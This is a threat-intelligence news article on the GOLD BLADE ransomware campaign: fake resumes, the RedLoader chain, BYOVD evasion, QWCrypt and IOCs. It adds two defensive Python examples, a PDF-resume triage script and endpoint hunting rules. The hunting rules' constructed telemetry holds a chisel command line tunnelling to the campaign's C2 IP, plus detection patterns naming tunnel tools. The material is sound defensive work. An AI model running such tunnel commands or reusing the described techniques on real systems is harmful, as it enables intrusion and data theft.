GOLD BLADE Exploiting Custom QWCrypt Locker for Data Exfiltration and Ransomware Deployment - cyberpress.org
By Priya
December 9, 2025
Categories: Cyber Security News, Ransomware
Between February 2024 and August 2025, Sophos threat analysts identified nearly 40 intrusions linked to the campaign tracked as STAC6565, attributed with high confidence to the GOLD BLADE threat group, also tracked as RedCurl, RedWolf, and Earth Kapre.
Once known for espionage operations, GOLD BLADE has evolved into a hybrid actor that combines data theft, credential harvesting, and selective ransomware deployment using its proprietary QWCrypt locker.
Nearly 80% of the campaign’s targets were Canada-based organizations, primarily in the services, manufacturing, retail, and technology sectors.
The group has shifted from classic spearphishing to a social engineering tactic that abuses recruitment platforms such as Indeed, JazzHR, and ADP WorkforceNow.
Instead of sending malicious emails, the attackers upload weaponized resumes as PDFs directly to recruitment portals, exploiting the trust HR departments place in those systems.
Opening the document leads the victim to a fake "Safe Resume Share Service" page that serves the RedLoader malware, initiating a multi-stage compromise.
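A first-pass triage for resume uploads, along the lines of the "sandbox incoming resumes" advice at the end of the article. This is an added example, not code from Sophos or from the article, and it only covers uncompressed link annotations and a handful of active-content markers; it decides what goes to a sandbox, it does not replace one. The sample PDF is constructed and reuses the workers.dev host from the article's IOC list; field names and verdict labels are this example's own.

```python
import re
from typing import Optional
from urllib.parse import urlparse

# Constructed sample: a minimal, uncompressed PDF with one link annotation whose
# target is the workers.dev host named in the article's IOC list. It is a
# stand-in for an uploaded "resume", not a real sample from the campaign.
SAMPLE_RESUME_PDF = b"""%PDF-1.4
1 0 obj << /Type /Catalog /Pages 2 0 R >> endobj
2 0 obj << /Type /Pages /Kids [3 0 R] /Count 1 >> endobj
3 0 obj << /Type /Page /Parent 2 0 R /MediaBox [0 0 612 792] /Annots [4 0 R] >> endobj
4 0 obj << /Type /Annot /Subtype /Link /Rect [72 700 300 720]
   /A << /S /URI /URI (https://automatinghrservices.workers.dev/resume) >> >> endobj
trailer << /Root 1 0 R >>
%%EOF
"""

# Hosts the article reports as payload/C2 infrastructure, plus the platform
# suffix: a resume has no reason to link to a Cloudflare Workers host at all.
KNOWN_BAD_HOSTS = {"automatinghrservices.workers.dev"}
SUSPICIOUS_SUFFIXES = (".workers.dev",)

# Literal-string /URI actions. Hex-string URIs (<...>) are not handled here.
URI_LITERAL = re.compile(rb"/URI\s*\(((?:\\.|[^\\)])*)\)", re.DOTALL)
# PDF features that make a document "active"; a plain resume needs none of them.
ACTIVE_FEATURE = re.compile(rb"/(JavaScript|JS|Launch|OpenAction|AA|SubmitForm|EmbeddedFile)\b")
# Objects inside compressed object streams or an encrypted file are invisible
# to a byte-level scan, so a clean result there is not a clean document.
OPAQUE = re.compile(rb"/(ObjStm|Encrypt)\b")


def extract_uris(pdf: bytes) -> list:
    """Targets of literal-string /URI actions, with \\( \\) \\\\ escapes undone."""
    return [re.sub(rb"\\(.)", rb"\1", m.group(1)).decode("latin-1")
            for m in URI_LITERAL.finditer(pdf)]


def classify_url(url: str) -> Optional[str]:
    """Reason a link is suspicious, or None if it looks like an ordinary web link."""
    parsed = urlparse(url)
    host = (parsed.hostname or "").lower()
    if host in KNOWN_BAD_HOSTS:
        return "known_bad_host"
    if host.endswith(SUSPICIOUS_SUFFIXES):
        return "workers_dev_host"
    if parsed.scheme.lower() not in ("http", "https", "mailto"):
        return "unusual_scheme"
    return None


def triage_resume(pdf: bytes) -> dict:
    """First-pass verdict for an uploaded resume PDF: pass, manual_review or quarantine."""
    uris = extract_uris(pdf)
    flagged = [(u, classify_url(u)) for u in uris if classify_url(u)]
    active = sorted({m.group(1).decode() for m in ACTIVE_FEATURE.finditer(pdf)})
    opaque = OPAQUE.search(pdf) is not None
    if flagged or active:
        verdict = "quarantine"        # route to a sandbox/detonation queue, never to HR
    elif opaque:
        verdict = "manual_review"     # needs a full PDF parser before any verdict
    else:
        verdict = "pass"
    return {"uris": uris, "flagged": flagged, "active_features": active,
            "opaque": opaque, "verdict": verdict}


if __name__ == "__main__":
    print(triage_resume(SAMPLE_RESUME_PDF))
```

The "manual_review" branch is the important caveat: a PDF whose objects live in compressed object streams (`/ObjStm`, standard since PDF 1.5) shows no `/URI` strings to a byte scan, so silence there means "parse it properly", not "clean".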
Multi-Stage RedLoader Chain and BYOVD Evasion
The RedLoader infection chain observed by Sophos has three stages: initial execution, secondary payload deployment, and final installation.
Early variants were delivered as .lnk and .iso files; by 2025 the chain had moved to DLL sideloading, with payloads fetched from Cloudflare Workers domains (e.g., automatinghrservices[.]workers[.]dev).
Each stage created browser-themed scheduled tasks for payload execution and persistence, proxying execution through living-off-the-land binaries such as pcalua.exe (the Program Compatibility Assistant launcher) so that the activity blends in with normal Windows processes.
[Figure: GOLD BLADE targeting by sector, February 2024 through August 2025]
To maintain command and control, GOLD BLADE leveraged open-source RPivot and Chisel tunneling tools, establishing SOCKS proxies to C2 servers hosted on Cloudflare Workers and external IP infrastructure.
Defense evasion employed a Bring Your Own Vulnerable Driver (BYOVD) technique, using modified Zemana AntiMalware drivers and customized Terminator utilities to disable EDR/XDR protections.
Analysts recovered distinctive build paths from the Terminator samples, pointing to an organized toolkit and a structured operation behind it.
In April and July 2025, GOLD BLADE deployed QWCrypt ransomware after completing data exfiltration. Delivered inside encrypted 7-Zip archives, the ransomware appended a .qwCrypt extension to encrypted files and dropped ransom notes styled after LockBit's.
Sophos CryptoGuard blocked the encryption on protected endpoints; on unprotected endpoints encryption did occur, but remained limited in scope.
The incident demonstrated GOLD BLADE’s strategic ability to alternate between espionage-for-hire and direct financial extortion.
Sophos detections for this campaign include Troj/Agent-BLEI, Troj/Ransom-HHH, and CXmal/KillAV-ZA.
Key indicators include multiple Cloudflare Workers C2 domains, the IP address 109[.]206[.]236[.]209, and a confirmed QWCrypt SHA-256 hash, 568352411deff640ba781ae55d98d657da02191d97e0466e6883b966dd1e77db.
Organizations are advised to sandbox incoming resumes, strengthen endpoint monitoring, and deploy managed detection and response (MDR) solutions to detect evolving GOLD BLADE techniques.
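A small hunting rule set that turns the behaviours described above into checks over endpoint telemetry: the pcalua.exe-backed, browser-themed scheduled tasks used for persistence, Chisel/RPivot tunnel processes, lookups of the Workers C2 domain and connections to the listed IP, a Zemana driver load (the BYOVD step), and files gaining the .qwCrypt extension. This is an added example, not Sophos detection content or code from the article. The event records are constructed and their field names are this example's own; the browser keyword list, the task name, the zam64.sys file name and the "Zemana" signer string are assumptions, since the article gives none of those specifics.

```python
import re

# Indicators taken from the article's IOC list (defanged there).
KNOWN_C2_DOMAINS = {"automatinghrservices.workers.dev"}
KNOWN_C2_IPS = {"109.206.236.209"}
QWCRYPT_EXT = ".qwcrypt"                       # matched case-insensitively
# Words a "browser-themed" task name would carry; the real task names are not
# given in the article, so this list is an assumption to tune locally.
BROWSER_WORDS = ("chrome", "edge", "firefox", "mozilla", "browser", "google")
PCALUA = re.compile(r"pcalua\.exe", re.IGNORECASE)
TUNNEL_TOOLS = re.compile(r"\b(chisel|rpivot)\b", re.IGNORECASE)
SEVERITY = {"low": 0, "medium": 1, "high": 2, "critical": 3}

# Constructed telemetry, one dict per event. Field names are this example's own,
# not those of any particular EDR. The zam64.sys file name and "Zemana" signer
# are assumptions about what a Zemana driver load would look like.
EVENTS = [
    {"type": "task_create", "host": "hr-ws-01", "task": r"\ChromeUpdateCheck",
     "command": r"C:\Windows\System32\pcalua.exe", "args": r"-a C:\Users\Public\update.exe"},
    {"type": "task_create", "host": "hr-ws-01", "task": r"\Microsoft\Windows\UpdateOrchestrator\USO_UxBroker",
     "command": r"C:\Windows\System32\usoclient.exe", "args": "StartInteractiveScan"},
    {"type": "process", "host": "hr-ws-01", "image": r"C:\Users\Public\chisel.exe",
     "cmdline": r"chisel.exe client 109.206.236.209:443 R:socks"},
    {"type": "dns", "host": "hr-ws-01", "query": "automatinghrservices.workers.dev"},
    {"type": "dns", "host": "dev-ws-07", "query": "internal-tools.workers.dev"},
    {"type": "net", "host": "hr-ws-01", "dst_ip": "109.206.236.209", "dst_port": 443},
    {"type": "driver_load", "host": "hr-ws-01", "image": r"C:\Windows\Temp\zam64.sys", "signer": "Zemana Ltd."},
    {"type": "file_rename", "host": "fs-01", "path": r"D:\Shares\Finance\Q2-forecast.xlsx.qwCrypt"},
]


def hunt(events):
    """Run the rules over a list of events and return one finding per hit."""
    findings = []

    def hit(ev, rule, severity, detail):
        findings.append({"host": ev["host"], "rule": rule, "severity": severity, "detail": detail})

    for ev in events:
        kind = ev["type"]
        if kind == "task_create":
            action = f'{ev.get("command", "")} {ev.get("args", "")}'.strip()
            # pcalua.exe -a <target> proxies execution of <target>; a scheduled
            # task that needs that is suspicious on its own, more so when the
            # task name is dressed up as a browser update.
            if PCALUA.search(action):
                themed = any(w in ev["task"].lower() for w in BROWSER_WORDS)
                hit(ev, "task_pcalua_proxy", "high" if themed else "medium", f'{ev["task"]} -> {action}')
        elif kind == "process":
            blob = f'{ev.get("image", "")} {ev.get("cmdline", "")}'
            if TUNNEL_TOOLS.search(blob):
                hit(ev, "tunnel_tool", "high", blob.strip())
        elif kind == "dns":
            q = ev["query"].lower().rstrip(".")
            if q in KNOWN_C2_DOMAINS:
                hit(ev, "known_c2_domain", "high", q)
            elif q.endswith(".workers.dev"):
                # Legitimate apps use Workers too; only worth a look in context.
                hit(ev, "workers_dev_lookup", "low", q)
        elif kind == "net" and ev["dst_ip"] in KNOWN_C2_IPS:
            hit(ev, "known_c2_ip", "high", f'{ev["dst_ip"]}:{ev["dst_port"]}')
        elif kind == "driver_load":
            blob = f'{ev.get("image", "")} {ev.get("signer", "")}'.lower()
            if "zemana" in blob:
                hit(ev, "byovd_zemana_driver", "high", ev["image"])
        elif kind == "file_rename" and ev["path"].lower().endswith(QWCRYPT_EXT):
            hit(ev, "qwcrypt_extension", "critical", ev["path"])
    return findings


def hosts_to_isolate(findings, floor="high"):
    """Hosts with at least one finding at or above the given severity."""
    return sorted({f["host"] for f in findings if SEVERITY[f["severity"]] >= SEVERITY[floor]})


if __name__ == "__main__":
    for f in hunt(EVENTS):
        print(f'{f["severity"]:<8} {f["host"]:<10} {f["rule"]:<22} {f["detail"]}')
    print("isolate:", hosts_to_isolate(hunt(EVENTS)))
```

The severities encode the caveats a practitioner would apply: a bare workers.dev lookup is low because the platform is widely used for legitimate services, while a .qwCrypt rename is critical because by that point exfiltration has already happened and encryption is under way.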